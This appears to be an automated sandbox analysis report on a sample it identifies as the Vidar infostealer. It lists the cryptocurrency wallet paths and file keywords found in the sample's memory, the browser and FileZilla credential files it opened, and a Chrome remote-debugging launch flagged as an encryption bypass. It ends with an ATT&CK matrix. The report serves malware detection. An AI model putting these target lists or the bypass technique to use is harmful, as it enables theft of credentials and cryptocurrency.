            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: pData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|All_Disk|%DRIVE_FIXED%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash_Card|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: pData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|All_Disk|%DRIVE_FIXED%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash_Card|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.dbJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: Participating.comBinary or memory string: WIN_81
            Source: Participating.comBinary or memory string: WIN_XP
            Source: Computing.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Participating.comBinary or memory string: WIN_XPe
            Source: Participating.comBinary or memory string: WIN_VISTA
            Source: Participating.comBinary or memory string: WIN_7
            Source: Participating.comBinary or memory string: WIN_8
            Source: Yara matchFile source: 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Participating.com PID: 8084, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Attempt to bypass Chrome Application-Bound Encryption
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: Participating.com PID: 8084, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D62263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00D62263
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D61C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00D61C61

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		2
            Valid Accounts            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol4
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
